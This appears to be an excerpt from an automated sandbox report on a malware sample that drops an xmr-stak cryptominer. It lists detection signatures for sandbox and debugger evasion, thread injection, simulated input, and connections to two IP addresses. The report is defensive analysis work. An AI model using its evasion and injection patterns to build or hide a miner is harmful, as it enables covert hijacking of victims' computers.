Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Win.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Win.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Win.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Win.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Win.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Win.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Win.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Win.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Win.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Win.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Win.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\playersclub\LaunchServ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\playersclub\LaunchServ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\playersclub\LaunchServ.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
Checks the free space of harddrivesShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick LaunchJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Users\user\Desktop\iaejSdZgD3.exeWindow / User API: threadDelayed 513Jump to behavior
Source: C:\Windows\notepad.exeWindow / User API: threadDelayed 3199
Found dropped PE file which has not been started or loadedShow sources
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libintl-8.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\Process.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\xmr-stak.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\xmrstak_opencl_backend.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\libcurl-4.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\msvcp140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\player.exeJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\cudart64_80.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libeay32.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\paexec.exeJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\pthreadVC2.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libwinpthread-1.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\xmrstak_cuda_backend.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\libidn-11.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\xmrstak_cuda_backend.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\xmrstak_opencl_backend.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\libintl-8.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\zlib1.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libidn-11.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\vcruntime140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\libiconv-2.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\player.exeJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libcurl-4.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\ssleay32.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\libwinpthread-1.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\vcruntime140.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\paexec.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\zlib1.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\ssleay32.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\cudart64_80.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\runProcesses.exeJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\xmr-stak.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\libeay32.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\msvcr100.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\runProcesses.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\pthreadVC2.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\msvcp140.dllJump to dropped file
Source: C:\ProgramData\Win.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libiconv-2.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\Process.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeDropped PE file which has not been started: C:\ProgramData\playersclub\msvcr100.dllJump to dropped file
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found evasive API chain checking for process token informationShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeAPI coverage: 1.7 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\iaejSdZgD3.exe TID: 2904Thread sleep count: 513 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2704Thread sleep time: -922337203685477s >= -60000sJump to behavior
Source: C:\Windows\notepad.exe TID: 452Thread sleep count: 3199 > 30
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\notepad.exeLast function: Thread delayed
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004121A0 GetKeyboardLayout followed by cmp: cmp cl, 00000019h and CTI: ja 00412296h6_2_004121A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00468360 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jne 004683CCh6_2_00468360
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0043E430 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jne 0043E469h6_2_0043E430
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0044AD20 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jne 0044AD66h6_2_0044AD20
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0044AEE0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jne 0044AF23h6_2_0044AEE0
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\iaejSdZgD3.exeCode function: 0_2_0000000140004D08 wcslen,wcslen,RtlAllocateHeap,wcscpy,wcscat,wcscat,FindFirstFileW,GetLastError,HeapFree,0_2_0000000140004D08
Source: C:\Users\user\Desktop\iaejSdZgD3.exeCode function: 0_2_000000014000B758 FindFirstFileW,0_2_000000014000B758
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE7B1A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_1_000000013FE7B1A8
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE9C630 FindFirstFileExA,5_1_000000013FE9C630
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE8E830 SendDlgItemMessageW,GetDlgItem,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,FindClose,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,5_1_000000013FE8E830
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00475350 FindFirstFileW,FindClose,GetFileAttributesW,6_2_00475350
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004753E0 _wcschr,_wcschr,_wcschr,_wcsncpy,_wcschr,FindClose,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,6_2_004753E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00454140 GetFullPathNameW,GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,__wsplitpath,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,FindNextFileW,FindClose,6_2_00454140
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00443150 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__alldiv,6_2_00443150
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00442290 _wcsncpy,_wcsrchr,_wcsrchr,FindFirstFileW,GetTickCount,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,__itow,6_2_00442290
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00453350 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize,6_2_00453350
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004424A7 GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,__itow,6_2_004424A7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004424A9 GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,__itow,6_2_004424A9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004548C0 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,6_2_004548C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004429C0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,6_2_004429C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00442B40 _wcsncpy,SystemTimeToFileTime,GetLastError,LocalFileTimeToFileTime,GetSystemTimeAsFileTime,_wcsrchr,_wcsrchr,FindFirstFileW,GetLastError,SetFileTime,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,6_2_00442B40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0042BC70 _wcsncpy,_wcsrchr,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_2_0042BC70
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00470CF0 FindFirstFileW,FindClose,GetFileAttributesW,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,6_2_00470CF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00441D00 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,_wcsrchr,GetLastError,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,6_2_00441D00
Source: C:\ProgramData\playersclub\LaunchServ.exeCode function: 12_2_00401A50 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,12_2_00401A50
Contains functionality to query system informationShow sources
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE91580 VirtualQuery,GetSystemInfo,5_1_000000013FE91580
Program exit pointsShow sources
Source: C:\ProgramData\Win.exeAPI call chain: ExitProcess graph end nodegraph_5-20042
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeAPI call chain: ExitProcess graph end node
Source: C:\ProgramData\playersclub\LaunchServ.exeAPI call chain: ExitProcess graph end node
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for debuggers (devices)Show sources
Source: C:\ProgramData\Win.exeFile opened: C:\Windows\WinSxS\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
Source: C:\ProgramData\Win.exeFile opened: C:\Windows\WinSxS\FileMaps\users_user_1_appdata_local_temp_rarsfx0_5b1a60acdb028280.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformationJump to behavior
Checks if the current process is being debuggedShow sources
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED2080 LdrGetProcedureAddress,VirtualAlloc,VirtualFree,9_1_00ED2080
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE925E8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_1_000000013FE925E8
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\iaejSdZgD3.exeCode function: 0_2_0000000140004B58 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0000000140004B58
Contains functionality to read the PEBShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED2DD0 mov eax, dword ptr fs:[00000030h]9_1_00ED2DD0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED2D90 mov eax, dword ptr fs:[00000030h]9_1_00ED2D90
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE9D6A0 GetProcessHeap,5_1_000000013FE9D6A0
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE9218C SetUnhandledExceptionFilter,_invalid_parameter_noinfo,5_1_000000013FE9218C
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE927C0 SetUnhandledExceptionFilter,5_1_000000013FE927C0
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FEA2E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_1_000000013FEA2E30
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE925E8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_1_000000013FE925E8
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE99BE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_1_000000013FE99BE4
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00496352 SetUnhandledExceptionFilter,6_2_00496352
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00494096 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00494096
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004919A5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_004919A5
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 46.30.215.96 80Jump to behavior
Source: C:\Windows\notepad.exeNetwork Connect: 104.207.130.172 80
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeThread register set: target process: 308Jump to behavior
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle, explorer.exe9_1_00ED7680
Contains functionality to launch a program with higher privilegesShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0042EF10 __wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,CreateProcessW,CloseHandle,CloseHandle,GetLastError,__wcsicoll,_wcschr,SetCurrentDirectoryW,_wcschr,_wcschr,GetFileAttributesW,_wcschr,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,GetLastError,FormatMessageW,6_2_0042EF10
Contains functionality to simulate keystroke pressesShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004110C0 keybd_event,GetTickCount,GetForegroundWindow,GetWindowTextW,6_2_004110C0
Contains functionality to simulate mouse eventsShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00410390 GetAsyncKeyState,GetSystemMetrics,GetSystemMetrics,GetCursorPos,WindowFromPoint,GetWindowThreadProcessId,SendMessageW,mouse_event,mouse_event,6_2_00410390
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: setup.exe, notepad.exe, 0000000A.00000000.14329055235.00000000008A0000.00000002.sdmpBinary or memory string: Program Manager
Source: setup.exe, notepad.exe, 0000000A.00000000.14329055235.00000000008A0000.00000002.sdmpBinary or memory string: Shell_TrayWnd
Source: notepad.exe, 0000000A.00000000.14329055235.00000000008A0000.00000002.sdmpBinary or memory string: !Progman
Source: setup.exe, 00000006.00000001.14306303332.000000000049F000.00000002.sdmp, installer.exe, 0000000B.00000000.14321313278.000000000049F000.00000002.sdmp, systemSpawn.exe, 0000000F.00000000.14333161648.000000000049F000.00000002.sdmp, systemSpawn.exe.6.drBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidgroupclass%s%uProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
